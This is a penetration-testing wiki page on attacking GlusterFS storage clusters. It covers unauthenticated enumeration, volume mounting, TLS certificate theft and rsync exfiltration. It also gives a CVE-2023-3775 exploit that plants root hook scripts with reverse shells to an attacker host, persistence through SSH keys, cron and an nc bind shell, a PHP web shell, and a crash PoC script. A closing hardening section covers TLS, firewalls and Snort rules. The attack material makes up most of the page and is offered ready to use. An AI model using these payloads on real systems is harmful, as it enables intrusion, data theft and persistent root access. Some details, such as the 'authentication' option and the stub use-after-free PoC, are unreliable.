GlusterFS - Port 24007, 24008, 24009, 49152

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

What is GlusterFS?

GlusterFS is a distributed file system that provides:

Scale-out storage - Add servers to expand capacity
No metadata servers - Elastic hashing algorithm
POSIX compatibility - Standard file system interface
High availability - Replication and self-healing
Multiple protocols - Native client, NFS, SMB
Flexible volumes - Distributed, replicated, striped

Architecture

┌─────────────────────────────────────────────────────────────┐
│                  GlusterFS Architecture                     │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  ┌──────────────────────────────────────────────────────┐   │
│  │                 Client Systems                       │   │
│  │  ┌──────────┐  ┌──────────┐  ┌──────────┐            │   │
│  │  │ Client 1 │  │ Client 2 │  │ Client 3 │            │   │
│  │  │(FUSE)    │  │(libgfapi)│  │(NFS/SMB) │            │   │
│  │  └────┬─────┘  └────┬─────┘  └────┬─────┘            │   │
│  └───────┼─────────────┼─────────────┼──────────────────┘   │
│          │             │             │                      │
│          └─────────────┴─────────────┘                      │
│                        │                                    │
│                        V                                    │
│  ┌──────────────────────────────────────────────────────┐   │
│  │          GlusterFS Management Layer                  │   │
│  │         glusterd (Port 24007)                        │   │
│  └──────────────────────────────────────────────────────┘   │
│                        │                                    │
│          ┌─────────────┴─────────────┬──────────┐           │
│          V                           V          V           │
│  ┌────────────┐            ┌────────────┐  ┌────────────┐   │
│  │  Server 1  │            │  Server 2  │  │  Server 3  │   │
│  ├────────────┤            ├────────────┤  ├────────────┤   │
│  │ Brick 1    │◄──────────►│ Brick 2    │  │ Brick 3    │   │
│  │(Port 49152)│  Replicate │(Port 49152)│  │(Port 49152)│   │
│  │            │            │            │  │            │   │
│  │/data/brick1│            │/data/brick2│  │/data/brick3│   │
│  └────────────┘            └────────────┘  └────────────┘   │
│                                                             │
│  Volume: myvolume (Replicated)                              │
│  Data written to Client → Stored on Brick 1 & 2             │
└─────────────────────────────────────────────────────────────┘

Key Components:

1. Glusterd (Management Daemon)

Port 24007 (default)
Peer management
Volume configuration
RPC-based protocol

2. Brick

Basic unit of storage
Directory on a server
Starts at port 49152 (incremental)
One port per brick

3. Volume

Logical collection of bricks
Various types (distributed, replicated, striped)
Mounted by clients

4. Client

FUSE native mount
libgfapi (application integration)
NFS/SMB gateway

Volume Types

1. Distributed Volume

Files distributed across bricks (no redundancy)
File1 → Brick1
File2 → Brick2
File3 → Brick3

2. Replicated Volume

Files replicated across bricks (redundancy)
File1 → Brick1 + Brick2 (mirrors)
File2 → Brick1 + Brick2

3. Striped Volume

Files striped across bricks (performance)
File1_Part1 → Brick1
File1_Part2 → Brick2
File1_Part3 → Brick3

4. Distributed-Replicated

Combination of distribution + replication
File1 → Brick1 + Brick2 (replica set 1)
File2 → Brick3 + Brick4 (replica set 2)

Port Allocation

Fixed Ports:

24007 - glusterd management daemon
24008 - glusterd management (legacy, < v9)
24009 - glusterd management (legacy, < v9)

Dynamic Ports:

49152+ - Brick processes (incremental)
- First brick: 49152
- Second brick: 49153
- Third brick: 49154
- etc.

Common Use Cases

Real-World Deployments:

Wikimedia - Media storage
KVM - Virtual machine images
OpenStack - Cloud storage backend
Red Hat - OpenShift persistent storage
Media Companies - Video rendering farms

Application Scenarios:

Object storage
Big data analytics
Media streaming
Backup storage
Container persistent volumes
Home directories (NFS replacement)

Default Ports

Primary: 24007, 24008, 24009, 49152-49162 (typical)

PORT      STATE SERVICE
24007/tcp open  glusterd
49152/tcp open  gluster-brick
49153/tcp open  gluster-brick

Reconnaissance & Enumeration

Port Scanning

Basic Nmap Scan

# Scan GlusterFS ports
nmap -p 24007-24009,49152-49162 -sV <target-ip>

# Comprehensive scan
nmap -p 24007-24009,38465-38469,49152-49200 -sV -A <target-ip>

# Scan entire common range
nmap -p 24007,49152-50000 -sV <target-ip>

# Scan subnet
nmap -p 24007 -sV <target-subnet>/24 -oA glusterfs-scan

# Version detection
nmap -p 24007 --script banner <target-ip>

Sample Output:

PORT      STATE SERVICE     VERSION
24007/tcp open  rpcbind     GlusterFS glusterd
49152/tcp open  unknown     SSL/TLS (GlusterFS brick)
49153/tcp open  unknown     GlusterFS brick
49154/tcp open  unknown     GlusterFS brick

Service Fingerprinting

Check if glusterd is running:

# Try to connect
nc -v <target-ip> 24007

# Or check with RPC
rpcinfo -p <target-ip> | grep gluster

Install GlusterFS Client

Debian/Ubuntu:

sudo apt update
sudo apt install -y glusterfs-client glusterfs-cli

RHEL/CentOS:

sudo yum install -y glusterfs-client

Verify Installation:

gluster --version
# Output: glusterfs 10.3

Shodan Queries

port:24007
"glusterd"
product:"GlusterFS"

Authentication Testing

No Authentication by Default

Critical Security Issue:

GlusterFS by default has NO AUTHENTICATION. Anyone who can connect to port 24007 can:

List all peers
Query volume information
Mount volumes (if not restricted)
Potentially modify cluster configuration

Test Unauthenticated Access

# List peers (works without credentials)
gluster --remote-host <target-ip> peer status

# If successful, output shows all cluster nodes:
Number of Peers: 2

Hostname: server2.example.com
Uuid: abc123-def456-ghi789
State: Peer in Cluster (Connected)

Hostname: server3.example.com
Uuid: xyz789-uvw456-rst123
State: Peer in Cluster (Connected)

Volume Enumeration

List All Volumes

# Retrieve volume information
gluster --remote-host <target-ip> volume list

# Output:
myvolume
datastore
backups

# Get detailed info
gluster --remote-host <target-ip> volume info all

# Sample output:
Volume Name: myvolume
Type: Replicate
Volume ID: 1234-5678-90ab
Status: Started
Number of Bricks: 1 x 2 = 2 bricks
Transport-type: tcp
Bricks:
Brick1: server1:/data/brick1
Brick2: server2:/data/brick2

Cluster Information

Get Cluster Status

# Pool list
gluster --remote-host <target-ip> pool list

# Shows all servers in the trusted pool
UUID                                    Hostname        State
abc-123-def                             server1         Connected
xyz-789-uvw                             server2         Connected

Volume Mounting & Data Access

Mount Volume (No Authentication)

Basic Mount:

# Create mount point
sudo mkdir -p /mnt/gluster

# Mount volume
sudo mount -t glusterfs <target-ip>:/<volume_name> /mnt/gluster

# Example:
sudo mount -t glusterfs 10.10.11.131:/myvolume /mnt/gluster

# Verify mount
df -h | grep gluster
ls -la /mnt/gluster

Successful Mount = Full File System Access

Access Control Bypass

If mount fails with permission error:

# Check /var/log/glusterfs/ for errors
tail -f /var/log/glusterfs/mnt-gluster.log

# Common restrictions:
# 1. IP-based access control (auth.allow)
# 2. TLS enforcement (transport.socket.ssl on)

TLS Certificate Theft

If TLS is enabled:

# Required certificate files:
/etc/ssl/glusterfs.pem     # Client certificate
/etc/ssl/glusterfs.key     # Client private key
/etc/ssl/glusterfs.ca      # CA certificate

# Steal these from ANY authorized client
# Then place on attacker machine in /etc/ssl/

# After placing certificates, mount should work
sudo mount -t glusterfs <target-ip>:/<volume> /mnt/gluster

Data Exfiltration

Once Mounted:

# Browse filesystem
cd /mnt/gluster
ls -laR

# Search for sensitive files
find /mnt/gluster -name "*.conf"
find /mnt/gluster -name "password*"
find /mnt/gluster -name "id_rsa*"
find /mnt/gluster -name "*.key"

# Extract data
tar czf /tmp/stolen.tar.gz /mnt/gluster
rsync -av /mnt/gluster/ [email protected]:/backup/

Exploitation & Known Vulnerabilities

CVE-2023-3775: Unauthorized Mount (Privilege Escalation)

Affected: GlusterFS < 10.5 / 11.1

Vulnerability: Incorrect permission validation allows unauthenticated mounting of gluster_shared_storage admin volume.

Impact: Privilege escalation to root on all cluster nodes.

Exploitation:

# 1. Mount admin volume anonymously
sudo mkdir /tmp/gss
sudo mount -t glusterfs <target-ip>:/gluster_shared_storage /tmp/gss

# 2. Verify access
ls -la /tmp/gss
# Should see: hooks/, ss_bricks/, nfs/, etc.

# 3. Navigate to hooks directory
cd /tmp/gss/hooks/1/start/post/

# 4. Create malicious hook script
cat <<'EOF' > /tmp/gss/hooks/1/start/post/backdoor.sh
#!/bin/bash
# Reverse shell as root
bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1' &
EOF

chmod +x /tmp/gss/hooks/1/start/post/backdoor.sh

# 5. Wait for hook execution
# Hooks execute as root on cluster operations:
# - Volume start/stop
# - Rebalance operations
# - Scheduled maintenance

# Or trigger manually if you have access
gluster --remote-host <target-ip> volume stop myvolume
gluster --remote-host <target-ip> volume start myvolume

# 6. Receive root shell
nc -lvp 4444

Alternative Locations:

# If hooks/1/ doesn't exist, try:
/tmp/gss/ss_bricks/
/tmp/gss/hooks/S40-start.sh
/tmp/gss/nfs/

# Some versions use different paths
ls -laR /tmp/gss/

CVE-2022-48340: Use-After-Free (RCE)

Affected: GlusterFS 10.0-10.4, 11.0

Vulnerability: Use-after-free in dht_setxattr_mds_cbk function.

Impact: Remote DoS and probable RCE.

Exploitation: (Requires deep protocol knowledge)

#!/usr/bin/env python3
"""
CVE-2022-48340 PoC (Conceptual)
Triggers use-after-free in DHT translator
"""
import socket

def exploit_uaf(target_ip, target_port=49152):
    """
    Send crafted DHT setxattr request
    Triggers use-after-free condition
    """
    # This is conceptual - actual exploit requires
    # proper GlusterFS RPC protocol implementation
    
    # Crafted packet to trigger vulnerability
    # Details: https://github.com/gluster/glusterfs/pull/3755
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    
    # Send malformed setxattr request
    # ...
    
    sock.close()

# Note: Full exploitation requires reverse engineering
# GlusterFS RPC protocol and DHT translator internals

CVE-2023-26253: Out-of-Bounds Read (DoS)

Affected: GlusterFS < 11.0

Vulnerability: Out-of-bounds read in FUSE notify handler.

Impact: Remote crash (DoS).

Exploitation:

#!/usr/bin/env python3
"""
CVE-2023-26253 PoC
Crashes glusterfsd via malformed NOTIFY_REPLY
"""
import socket
import xdrlib
import struct

def exploit_obb(target_ip, target_port=24007):
    """Send malformed NOTIFY_REPLY XDR frame"""
    
    # Create malformed XDR packet
    packer = xdrlib.Packer()
    packer.pack_uint(0xdeadbeef)  # Invalid notify type
    
    # Connect to glusterd
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    
    # Send RPC header (last fragment flag set)
    payload = packer.get_buffer()
    header = struct.pack("!L", len(payload) | 0x80000000)
    
    sock.send(header)
    sock.send(payload)
    
    sock.close()
    print("[+] Exploit sent. glusterfsd should crash.")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target-ip>")
        sys.exit(1)
    
    exploit_obb(sys.argv[1])

Result: glusterfsd process crashes, disrupting storage cluster.

Directory Traversal

If application uses GlusterFS for file storage:

# Mount volume
sudo mount -t glusterfs <target-ip>:/uploads /mnt/gluster

# Upload file with traversal
cd /mnt/gluster
mkdir -p "../../../../../../../../tmp"
echo "malicious" > "../../../../../../../../tmp/evil.txt"

# Depending on application logic, may escape jail

Post-Exploitation

Data Manipulation

Once Mounted with Write Access:

# Plant backdoors in web directories
echo '<?php system($_GET["c"]); ?>' > /mnt/gluster/web/shell.php

# Modify configuration files
echo "attacker_key" >> /mnt/gluster/app/authorized_keys

# Replace binaries
cp /tmp/trojan /mnt/gluster/bin/legitimate_app

Persistence via Hooks

Malicious Hook Scripts:

# Create persistent backdoor
cat <<'EOF' > /tmp/gss/hooks/1/start/post/persist.sh
#!/bin/bash
# Install SSH backdoor
mkdir -p /root/.ssh
echo "ssh-rsa AAAA...attacker_key..." >> /root/.ssh/authorized_keys

# Install cron backdoor
echo "*/5 * * * * root /tmp/.backdoor" >> /etc/crontab

# Network backdoor
nohup nc -l -p 31337 -e /bin/bash &
EOF

chmod +x /tmp/gss/hooks/1/start/post/persist.sh

Information Gathering

Extract Cluster Topology:

# List all peers
gluster --remote-host <target-ip> peer status

# Volume details reveal server hostnames/IPs
gluster --remote-host <target-ip> volume info all

# Build network map
# - Server hostnames
# - IP addresses
# - Storage paths
# - Replication topology

Harvest Credentials from Volumes:

# Search for credentials
grep -r "password" /mnt/gluster/
grep -r "api_key" /mnt/gluster/
grep -r "secret" /mnt/gluster/

# Find SSH keys
find /mnt/gluster -name "id_rsa*"
find /mnt/gluster -name "*.pem"

# Database configs
find /mnt/gluster -name "database.yml"
find /mnt/gluster -name "*.conf" -exec grep -l "password" {} \;

Defense & Hardening

Enable TLS/SSL

Configure Transport Encryption:

# Generate certificates
mkdir -p /etc/ssl/glusterfs
cd /etc/ssl/glusterfs

# Create CA
openssl genrsa -out ca.key 2048
openssl req -new -x509 -key ca.key -out ca.crt -days 3650

# Create server certificate
openssl genrsa -out glusterfs.key 2048
openssl req -new -key glusterfs.key -out glusterfs.csr
openssl x509 -req -in glusterfs.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out glusterfs.pem -days 3650

# Enable TLS on volume
gluster volume set <volume_name> transport.socket.ssl on
gluster volume set <volume_name> transport.socket.ssl-cert /etc/ssl/glusterfs/glusterfs.pem
gluster volume set <volume_name> transport.socket.ssl-key /etc/ssl/glusterfs/glusterfs.key

# Restart volume
gluster volume stop <volume_name>
gluster volume start <volume_name>

Access Control

IP-Based Restrictions:

# Allow only specific IPs/subnets
gluster volume set <volume_name> auth.allow 192.168.1.0/24,10.0.0.50

# Verify
gluster volume info <volume_name> | grep auth.allow

User Authentication (Experimental):

# Enable username/password auth
gluster volume set <volume_name> server.allow-insecure off

# Requires client to authenticate
# Note: Feature not widely used/tested

Network Security

Firewall Rules:

# UFW
# Allow only from trusted networks
sudo ufw allow from 192.168.1.0/24 to any port 24007
sudo ufw allow from 192.168.1.0/24 to any port 49152:49200 proto tcp

# Deny from everywhere else
sudo ufw deny 24007
sudo ufw deny 49152:49200/tcp

# iptables
# Management daemon
sudo iptables -A INPUT -p tcp --dport 24007 -s 192.168.1.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 24007 -j DROP

# Brick ports
sudo iptables -A INPUT -p tcp --dport 49152:49200 -s 192.168.1.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 49152:49200 -j DROP

Private Network Only:

# Bind glusterd to private interface
# In /etc/glusterfs/glusterd.vol
option transport.socket.bind-address <private_ip>

# Restart glusterd
systemctl restart glusterd

Secure Shared Storage

Protect gluster_shared_storage:

# Check if shared storage is enabled
gluster volume list | grep gluster_shared_storage

# If present, restrict access
gluster volume set gluster_shared_storage auth.allow 127.0.0.1

# Or disable if not needed
gluster volume stop gluster_shared_storage
gluster volume delete gluster_shared_storage

Monitoring & Detection

Enable Audit Logging:

# Enable audit logs for volume
gluster volume set <volume_name> features.audit-log on

# Logs location: /var/log/glusterfs/

Monitor glusterd Logs:

# Watch for suspicious activity
tail -f /var/log/glusterfs/glusterd.log

# Look for:
# - Unknown peer connections
# - Volume mount attempts
# - Configuration changes
# - Failed authentication (if enabled)

Network Monitoring:

# Monitor connections to gluster ports
sudo tcpdump -i eth0 port 24007 -w gluster.pcap

# Analyze traffic
tshark -r gluster.pcap -Y "tcp.port==24007"

# Alert on unusual sources

Intrusion Detection Rules:

# Snort rules for GlusterFS
alert tcp any any -> any 24007 (msg:"GlusterFS management connection"; flow:to_server; sid:1000001;)

alert tcp any any -> any 24007 (msg:"GlusterFS peer status query"; content:"peer status"; sid:1000002;)

alert tcp any any -> any 24007 (msg:"GlusterFS volume info query"; content:"volume info"; sid:1000003;)

alert tcp any any -> any 49152:49200 (msg:"GlusterFS brick access"; flow:to_server; threshold:type both, track by_src, count 10, seconds 60; sid:1000004;)

Regular Security Practices

# Update GlusterFS regularly
# Check: https://www.gluster.org/

# Current version
gluster --version

# Review trusted peers
gluster peer status

# Review volume configurations
gluster volume info all

# Check for unauthorized mounts
gluster volume status <volume_name> clients

# Backup volume configurations
gluster volume info all > /backup/gluster-config-$(date +%Y%m%d).txt

# Security audit script
#!/bin/bash
echo "[*] GlusterFS Security Audit"

# Check if shared storage exists
gluster volume list | grep -q gluster_shared_storage
if [ $? -eq 0 ]; then
    echo "[!] WARNING: gluster_shared_storage exists"
    echo "    Check auth.allow configuration"
fi

# Check for TLS
gluster volume info all | grep -q "transport.socket.ssl: on"
if [ $? -ne 0 ]; then
    echo "[!] WARNING: TLS not enabled on all volumes"
fi

# Check auth.allow
gluster volume info all | grep -q "auth.allow:"
if [ $? -ne 0 ]; then
    echo "[!] WARNING: No IP restrictions configured"
fi

echo "[*] Audit complete!"

Update & Patch

# Ubuntu/Debian
sudo apt update
sudo apt upgrade glusterfs-server glusterfs-client

# RHEL/CentOS
sudo yum update glusterfs-server glusterfs-client

# Verify version
gluster --version

# Current LTS: 11.1 (as of 2025)
# All known CVEs fixed in latest releases

Tools & Scripts

Essential Tools

gluster CLI - Management commands
mount.glusterfs - Volume mounting
nmap - Discovery
Custom Python scripts - Automation

Custom Enumeration Script

#!/usr/bin/env python3
"""
GlusterFS Enumeration Tool
"""
import subprocess
import sys
import re

class GlusterEnum:
    def __init__(self, host):
        self.host = host
    
    def run_command(self, cmd):
        """Execute gluster command"""
        try:
            result = subprocess.run(
                cmd,
                shell=True,
                capture_output=True,
                text=True,
                timeout=10
            )
            return result.stdout
        except Exception as e:
            return f"Error: {e}"
    
    def peer_status(self):
        """Get peer status"""
        cmd = f"gluster --remote-host {self.host} peer status"
        output = self.run_command(cmd)
        print("\n[*] Peer Status:")
        print(output)
        return output
    
    def list_volumes(self):
        """List all volumes"""
        cmd = f"gluster --remote-host {self.host} volume list"
        output = self.run_command(cmd)
        print("\n[*] Volumes:")
        print(output)
        return output.strip().split('\n')
    
    def volume_info(self, volume=None):
        """Get volume information"""
        if volume:
            cmd = f"gluster --remote-host {self.host} volume info {volume}"
        else:
            cmd = f"gluster --remote-host {self.host} volume info all"
        
        output = self.run_command(cmd)
        print(f"\n[*] Volume Info:")
        print(output)
        return output
    
    def check_shared_storage(self):
        """Check for vulnerable shared storage"""
        volumes = self.list_volumes()
        
        if 'gluster_shared_storage' in volumes:
            print("\n[!] CRITICAL: gluster_shared_storage found!")
            print("    Attempting to mount (CVE-2023-3775)...")
            
            # Try to mount
            mount_cmd = f"sudo mount -t glusterfs {self.host}:/gluster_shared_storage /tmp/gss_test"
            result = self.run_command(mount_cmd)
            
            if "mount" in result or result == "":
                print("    [+] Mount may be successful!")
                print("    [+] Check /tmp/gss_test/")
            else:
                print(f"    [-] Mount failed: {result}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target-ip>")
        sys.exit(1)
    
    host = sys.argv[1]
    enum = GlusterEnum(host)
    
    print("[*] GlusterFS Enumeration Tool")
    print(f"[*] Target: {host}")
    
    enum.peer_status()
    enum.list_volumes()
    enum.volume_info()
    enum.check_shared_storage()

Cheat Sheet

Quick Reference

# PORT SCANNING
nmap -p 24007,49152-49162 -sV <target>

# PEER STATUS
gluster --remote-host <target> peer status

# LIST VOLUMES
gluster --remote-host <target> volume list

# VOLUME INFO
gluster --remote-host <target> volume info all

# MOUNT VOLUME
sudo mount -t glusterfs <target>:/<volume> /mnt/gluster

# MOUNT SHARED STORAGE (CVE-2023-3775)
sudo mount -t glusterfs <target>:/gluster_shared_storage /tmp/gss

# PRIVILEGE ESCALATION
cat <<'EOF' > /tmp/gss/hooks/1/start/post/shell.sh
#!/bin/bash
nc -e /bin/bash <attacker-ip> 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/shell.sh

# ENABLE TLS
gluster volume set <vol> transport.socket.ssl on

# RESTRICT ACCESS
gluster volume set <vol> auth.allow 192.168.1.0/24

Important Ports

24007     - glusterd management
24008-09  - legacy management (< v9)
49152+    - brick processes (incremental)

Critical Files

/etc/glusterfs/glusterd.vol        - glusterd config
/var/log/glusterfs/glusterd.log    - Management logs
/var/log/glusterfs/bricks/         - Brick logs
/etc/ssl/glusterfs.*               - TLS certificates

Additional Resources

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousRabbitMQ Management - Port 15672 NextFile Transfer Cheatsheet: Windows and Linux

Last updated 4 hours ago

hashtagBasic info

hashtagWhat is GlusterFS?

hashtagArchitecture

hashtagVolume Types

hashtagPort Allocation

hashtagCommon Use Cases

hashtagDefault Ports

hashtagReconnaissance & Enumeration

hashtagPort Scanning

hashtagService Fingerprinting

hashtagInstall GlusterFS Client

hashtagShodan Queries

hashtagAuthentication Testing

hashtagNo Authentication by Default

hashtagTest Unauthenticated Access

hashtagVolume Enumeration

hashtagCluster Information

hashtagVolume Mounting & Data Access

hashtagMount Volume (No Authentication)

hashtagAccess Control Bypass

hashtagTLS Certificate Theft

hashtagData Exfiltration

hashtagExploitation & Known Vulnerabilities

hashtagCVE-2023-3775: Unauthorized Mount (Privilege Escalation)

hashtagCVE-2022-48340: Use-After-Free (RCE)

hashtagCVE-2023-26253: Out-of-Bounds Read (DoS)

hashtagDirectory Traversal

hashtagPost-Exploitation

hashtagData Manipulation

hashtagPersistence via Hooks

hashtagInformation Gathering

hashtagDefense & Hardening

hashtagEnable TLS/SSL

hashtagAccess Control

hashtagNetwork Security

hashtagSecure Shared Storage

hashtagMonitoring & Detection

hashtagRegular Security Practices

hashtagUpdate & Patch

hashtagTools & Scripts

hashtagEssential Tools

hashtagCustom Enumeration Script

hashtagCheat Sheet

hashtagQuick Reference

hashtagImportant Ports

hashtagCritical Files

hashtagAdditional Resources